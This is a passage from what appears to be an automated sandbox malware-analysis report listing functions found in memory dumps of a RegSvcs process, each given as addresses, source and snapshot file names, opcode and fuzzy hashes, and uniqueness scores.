                                              Function 073CA438 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b2e93b3cc775b289f7f851e0f60c4de5fda0d542f1c917d3b2edaafde7e0465
                                              • Instruction ID: 9ddcff0c2484a34c7a402c9dc975a0135ea4b170e30fb66f6e6f0276f9ef7e95
                                              • Opcode Fuzzy Hash: 9b2e93b3cc775b289f7f851e0f60c4de5fda0d542f1c917d3b2edaafde7e0465
                                              • Instruction Fuzzy Hash: D901F571301351CFDB0AFB24F45499D3BA2DBC6654B04859DC2018F382DF719E0687E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07350833 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f26346ba48209364f741cd14ae9402225a9c576f5d71fc37aef0625184ebcf59
                                              • Instruction ID: 7ec8769d85665782a586d5febbad4a06d07249189db49190c9ab2d1c848810a4
                                              • Opcode Fuzzy Hash: f26346ba48209364f741cd14ae9402225a9c576f5d71fc37aef0625184ebcf59
                                              • Instruction Fuzzy Hash: 9C012971700205DFD708DF29D884D5ABBFAEF89321B1545AAE909CB322DB71EC01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07350838 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9e9f92d40be21dd69409dc18596f2f08150d8ebb3b73e5a9c3c7513cef8a2f2
                                              • Instruction ID: 57ea2bac45687a4c39918b5aa6a90a9cd611fed4124e7958fc530d5893284a71
                                              • Opcode Fuzzy Hash: b9e9f92d40be21dd69409dc18596f2f08150d8ebb3b73e5a9c3c7513cef8a2f2
                                              • Instruction Fuzzy Hash: 28011771700205DFD718DF2AD884D5ABBFAEF88321B1585AAE909CB321DB71EC018B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B1948 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e7ddce2b11953fff7bca900f674d342bc6067d17d691a6f4d2d08ffe83dab08
                                              • Instruction ID: 469177d1099f32250b51e2b4046622db095d5fb4753fc8b82dbe56d56c9d2e77
                                              • Opcode Fuzzy Hash: 0e7ddce2b11953fff7bca900f674d342bc6067d17d691a6f4d2d08ffe83dab08
                                              • Instruction Fuzzy Hash: A50196717105089FCB149B29C959BAE7BF6EF8C710F214069E502E73A0CFB19D01CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C2370 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 993696f04a6500882245225e8f1cf65a33e16bd7da3c3377c717d366ced12ace
                                              • Instruction ID: c2e2db3f9f914e1cdc699476737dadfc01f7d0ade3fe0d64c06dc901a5e27c95
                                              • Opcode Fuzzy Hash: 993696f04a6500882245225e8f1cf65a33e16bd7da3c3377c717d366ced12ace
                                              • Instruction Fuzzy Hash: EF015E71A11219EFDB14DF64D84A6AF7BB9FF88750F044439E91AD3241DB358D10CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073531B9 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df053892781884fb00ea1029ec063fd535083535d1337fb9c3acedf8da9d1fd8
                                              • Instruction ID: 5365dc81fe3dddc24afdf435a6d881077ecaf8d12c7f18a89368b082f55b1358
                                              • Opcode Fuzzy Hash: df053892781884fb00ea1029ec063fd535083535d1337fb9c3acedf8da9d1fd8
                                              • Instruction Fuzzy Hash: DC115AB4D10218ABEB14DFA9D940AEEBBF2AF48350F108119E804B6351CB305940CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07352078 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c715cb9e250633708291f23b8dad093119e862db4f6da329c7614c1433aedbbc
                                              • Instruction ID: 1705ea8aa72681284a724de6195f78fe28dd0912447117636ac065dac22c8b1c
                                              • Opcode Fuzzy Hash: c715cb9e250633708291f23b8dad093119e862db4f6da329c7614c1433aedbbc
                                              • Instruction Fuzzy Hash: CEF08173700215AF9B54DE59F845DBFBBAEFBC8264714812AF509C3200DF319815DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735C6C0 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1974bd8d02406c8ce0202f82735f3e92a00b9f8f47a9e412ccd1370c9667a93
                                              • Instruction ID: 86f9fa3d7ec6e3f5f0bb04d95b3b68b6ded607e2adbdf13a4446cd5b113a4e7c
                                              • Opcode Fuzzy Hash: b1974bd8d02406c8ce0202f82735f3e92a00b9f8f47a9e412ccd1370c9667a93
                                              • Instruction Fuzzy Hash: FE01D271200706CBD729DF29D84094BBBF5EFC4350B009A2DE55997665DBB0FD058B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073586C8 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14cdc7d4360ef32eb0dfbfdf5836f098829728e3b76abbc25a56bd2675d37673
                                              • Instruction ID: 62491651cf2a8882921fca16d1c0fb6f6c3c8e4190621dc11cf8959fe1ad2579
                                              • Opcode Fuzzy Hash: 14cdc7d4360ef32eb0dfbfdf5836f098829728e3b76abbc25a56bd2675d37673
                                              • Instruction Fuzzy Hash: F0F04F353146918FC705DB3EE8588A9BBE69FCA66031580ABE60ACB372EF71DC018750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07354509 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c62cdba9aaa65ff58da2845cff0460cac787f943bdc76a1998ba7b7a2fce95d9
                                              • Instruction ID: 9404a71275940cb0f535726e38040d0b890acddaa17b4b729337ac7acb7ce826
                                              • Opcode Fuzzy Hash: c62cdba9aaa65ff58da2845cff0460cac787f943bdc76a1998ba7b7a2fce95d9
                                              • Instruction Fuzzy Hash: 5E0181726042559FDB05CF6DD844D96BBF9EF8A360B058166E848CB261DA30EC45CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BE618 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84739f79aca5d22b1174d07ec22a6dd69763656df5e54fbaee792051695d8a23
                                              • Instruction ID: dae10d7441fa514664ce480383506a80f0b5d6ed345eabefd81c61d5186f060e
                                              • Opcode Fuzzy Hash: 84739f79aca5d22b1174d07ec22a6dd69763656df5e54fbaee792051695d8a23
                                              • Instruction Fuzzy Hash: D501DB302013429BC60EA668E860A6E7FE2EFCA2407044569D84A9B681EF20ED0687A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0C91 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0e16dcb5ebfe237d3cfa1fbecd898abff27e740a05ebdd302734284e13ae20f
                                              • Instruction ID: ffadb50fddcc26264b4cba5df10cc68c3701c53f740793fac7654a972825b166
                                              • Opcode Fuzzy Hash: d0e16dcb5ebfe237d3cfa1fbecd898abff27e740a05ebdd302734284e13ae20f
                                              • Instruction Fuzzy Hash: 8001F230201316CFDB0AEB24E49496E7BA6DF81208710896DC645CF286DF21AD0A8BE2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359B18 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa7ee8327fcb588c5b3a5dfac24bbb2badf739a08e23ee1fed26a80a50e63366
                                              • Instruction ID: 42b965f16e85dff3b6bf5eb9d3512869dca2de0db7abf70df084151aaffa18e2
                                              • Opcode Fuzzy Hash: fa7ee8327fcb588c5b3a5dfac24bbb2badf739a08e23ee1fed26a80a50e63366
                                              • Instruction Fuzzy Hash: 300100312007058BD729DF29E94094BBBE5EFC4350B00962DE55A87621DBB0BD098B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073531C8 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 585055fb9fb3fbc95a0625b1c5b50bbbf3f3373ea9f6b733db22e6f35afabfbd
                                              • Instruction ID: e55654ca2511ddd1c2ebf15ce3b9caa82b72704f0d0f1f2b300784dd8dbc537e
                                              • Opcode Fuzzy Hash: 585055fb9fb3fbc95a0625b1c5b50bbbf3f3373ea9f6b733db22e6f35afabfbd
                                              • Instruction Fuzzy Hash: 470169B4E14218ABDF04DFA9D944AEEBFF2AF88350F148129EC04B7350CB715A00CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B34A0 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58e46d9025fe1bf3dd08e173d0bde8c78868007313f4f0286e25f4d61d7e6d45
                                              • Instruction ID: c95b4315e360f583e6160ec6791132cf4ac582e8fdb823c26501546a6aa1aa50
                                              • Opcode Fuzzy Hash: 58e46d9025fe1bf3dd08e173d0bde8c78868007313f4f0286e25f4d61d7e6d45
                                              • Instruction Fuzzy Hash: 79F0B4B7B0022767E726084B9C50BBF6A5BEBD47A1F098035FE0583245CA36CD55A2A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BFC68 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45269bc8a51d75e8c2c9f7f1afde6477cbd594b126cebbce0994ce42b74ce077
                                              • Instruction ID: c8c58f962fd28c1071600a145b4415127a0df0e0dba2531d2db920565ec92e5e
                                              • Opcode Fuzzy Hash: 45269bc8a51d75e8c2c9f7f1afde6477cbd594b126cebbce0994ce42b74ce077
                                              • Instruction Fuzzy Hash: 83016DB0631303DFC739DA759A046A3B7E6BB85345B149C2DD90286A19DAB5E9C0CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C392F Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fd9ba1fa66160f707cc442d11ce0cefc72ba62d8db9fd87fac3320ef7448c5c
                                              • Instruction ID: bc01ab6cafc58abfca2c26a18c932a1f4a16e6bb0f4294398345b21c205a23a6
                                              • Opcode Fuzzy Hash: 5fd9ba1fa66160f707cc442d11ce0cefc72ba62d8db9fd87fac3320ef7448c5c
                                              • Instruction Fuzzy Hash: 07F0A4759001089F8B50EFAAD8809DEBBF9FF98250750452BD509D3601D770A652CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073CA448 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41e1fc4a75337f8f26ed6fe36d918b617b013afa20e2dfdbd00734d453b33604
                                              • Instruction ID: f8290e0343d3b86fb1052af874d041b6f394134ba93d9d2b02dba736a8e4a88a
                                              • Opcode Fuzzy Hash: 41e1fc4a75337f8f26ed6fe36d918b617b013afa20e2dfdbd00734d453b33604
                                              • Instruction Fuzzy Hash: E101A231300211CFDF0AFB24F45895D3BA2DBC2254750466CC2058F345DF719E068BD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0E51 Relevance: .0, Instructions: 39COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f47927cd88d1c091e2960de92667ed3096d7841aca1b46307d60cc5f748872e
                                              • Instruction ID: 354dab85c47fd8f635f4db418e76b7d990228e1b0b8ce20e6c3b4e3b8f9efcfd
                                              • Opcode Fuzzy Hash: 8f47927cd88d1c091e2960de92667ed3096d7841aca1b46307d60cc5f748872e
                                              • Instruction Fuzzy Hash: 12015AB5A50369DBEB04DF74ED80AAD7BB2BF89304F148119D905A7396DB719C00DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073586D8 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c5ff9e296cd9631bdda651fff42d41701d5a74289c96056a914ea2cd79184b2
                                              • Instruction ID: da24fab52535e11d5919db7cd31ff2d0a2dba865bc10fe26a79867daf2c90eb5
                                              • Opcode Fuzzy Hash: 3c5ff9e296cd9631bdda651fff42d41701d5a74289c96056a914ea2cd79184b2
                                              • Instruction Fuzzy Hash: 53F0F4353105118FD754DA3EE45485977DAAFCD65131590B9E606C7370DFB1DC018750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07352067 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54056f860bb2586100025ccbf426f79791478e250314646ee63038e70da0f736
                                              • Instruction ID: 78c2f444af1cbcff80977a7c8891c745d871c5cb9dd9cf299d23f8134b222532
                                              • Opcode Fuzzy Hash: 54056f860bb2586100025ccbf426f79791478e250314646ee63038e70da0f736
                                              • Instruction Fuzzy Hash: E5F0E2B270935A6F9B25CA296C50DBF7FEDFB84228B08402AF80CC3201DA219805C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BE628 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b52844817853451b20e307bb36c8d0e3f85e0cc528894b10e828577b6cf524a1
                                              • Instruction ID: 0614122ebd95bab6db68e6ef04ba38e23c0e9a79ee6a83f268368a59aa3a44aa
                                              • Opcode Fuzzy Hash: b52844817853451b20e307bb36c8d0e3f85e0cc528894b10e828577b6cf524a1
                                              • Instruction Fuzzy Hash: 41F067313002019BDA4DEA29E85096E7BE6FBC9240714992CD50AABB40EF60ED0687E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BE430 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bbe3874fe67fcb33264027580a0d7ef42ecfb57f81695e389906779b67bf676
                                              • Instruction ID: 63b59bb9887b48d7f1bce8b2998ad10eb475cba10f43ec924a4ab65d0f77688f
                                              • Opcode Fuzzy Hash: 2bbe3874fe67fcb33264027580a0d7ef42ecfb57f81695e389906779b67bf676
                                              • Instruction Fuzzy Hash: 27F090312043829BD326DB38E84088BFFE1EEC5220308895FD0C5CB966DAA46C89C3D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2B98 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5c2a6b4f06279afb6a9ff1d37561dbcdbdf1fce8f00eac7e20436c05de3f596
                                              • Instruction ID: ef6cc647b787b41b12dd53338d36b1429b228c3876d8eca5fbfe86f40138f74b
                                              • Opcode Fuzzy Hash: c5c2a6b4f06279afb6a9ff1d37561dbcdbdf1fce8f00eac7e20436c05de3f596
                                              • Instruction Fuzzy Hash: 92F03C71A11308DBDB29DF54D529BEE7BF6BB89340F200569D4017B384CBB65D05DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2968 Relevance: .0, Instructions: 35COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3ff3a8311cf64c31f778160ce1202fecc9b2c38f5f37dd0c2583c4a937a411e
                                              • Instruction ID: 093186ec334addf582143c89dd411214186425ba41c57a862abea12fc4cca3cb
                                              • Opcode Fuzzy Hash: c3ff3a8311cf64c31f778160ce1202fecc9b2c38f5f37dd0c2583c4a937a411e
                                              • Instruction Fuzzy Hash: 72F01971A11359CBCF29EB69C4147DE7BF2BB89340F20456DD005A7394CBB55D05CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3DF0 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f034a358a2ccc7a484b101a544583b9461a07eb75fa996320b778052cde360a
                                              • Instruction ID: 5365eba29becb14427d5178953d64d397a426f8dfabaed30d7229d4ffeed2cd1
                                              • Opcode Fuzzy Hash: 3f034a358a2ccc7a484b101a544583b9461a07eb75fa996320b778052cde360a
                                              • Instruction Fuzzy Hash: 47F03A36300105DFD700DF69D888C6ABBA9FF88720B508169E60987331CB719C11CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0CA0 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e06b5fbd15de9613cb2345868f73c11c3c119579f18ebd31c27915f48a08c3d
                                              • Instruction ID: b920cd593294a47675dcd5ceab246e6d2d98729a016d05548f0af440184a2a89
                                              • Opcode Fuzzy Hash: 9e06b5fbd15de9613cb2345868f73c11c3c119579f18ebd31c27915f48a08c3d
                                              • Instruction Fuzzy Hash: F0F09030300215CBDB4AFB68E0A456D77A6DBC1244740496CC6058F385DE669D0647E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07350B0B Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9fe0f91ba358b05e19d0b2265f982e9d4bf9ed38f117478e5480897d6f1f5985
                                              • Instruction ID: a4e81cc5f7639d3351846bdde80a0cbd5f29926c2cd76b0d628578595c14f42b
                                              • Opcode Fuzzy Hash: 9fe0f91ba358b05e19d0b2265f982e9d4bf9ed38f117478e5480897d6f1f5985
                                              • Instruction Fuzzy Hash: D9F0A7393502019FE755DBB9F841F55B791EB80324F10903AF786CB6D1CBA1D455D750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2920 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23ec766e2250e063d9331e9fc7fd889464fd21065f4952d38ac693ccc16772d9
                                              • Instruction ID: 93d21baf1073e6b7fc6ef35549f83b6639f2eefc53d71b70823d88150d25f714
                                              • Opcode Fuzzy Hash: 23ec766e2250e063d9331e9fc7fd889464fd21065f4952d38ac693ccc16772d9
                                              • Instruction Fuzzy Hash: 8AF0E9B2A2070ACBDF14EB54D8547ED37F1FB48394F305519C00AE6344DBB45A05C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7EB3 Relevance: .0, Instructions: 30COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b2234c736e1c89a2a9a64a4e8e8e39cdaa7770abf2d6e32c74834ea7f63d0b8
                                              • Instruction ID: fd875473c016811ab2f10d45c00c343c643a9621d15651a68376506fb71f398d
                                              • Opcode Fuzzy Hash: 6b2234c736e1c89a2a9a64a4e8e8e39cdaa7770abf2d6e32c74834ea7f63d0b8
                                              • Instruction Fuzzy Hash: 43F05E70D0A388AFCB16DFB894554ADBFB09F46200B0444EFD484D7352EA341A45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B3BE1 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7082529d16a6818ca7277f71217702f6f1fcd7ba10efae35ec6fb2cf9b13abc1
                                              • Instruction ID: 32f48bec4a2db9d5d82c93588e62de87699b052666eb6d78d9bd38e91c2a08ba
                                              • Opcode Fuzzy Hash: 7082529d16a6818ca7277f71217702f6f1fcd7ba10efae35ec6fb2cf9b13abc1
                                              • Instruction Fuzzy Hash: 32E061A153F3729FD31B463978114DB3F50D65321070810CFE041CB243CA4445068391
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735A570 Relevance: .0, Instructions: 26COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
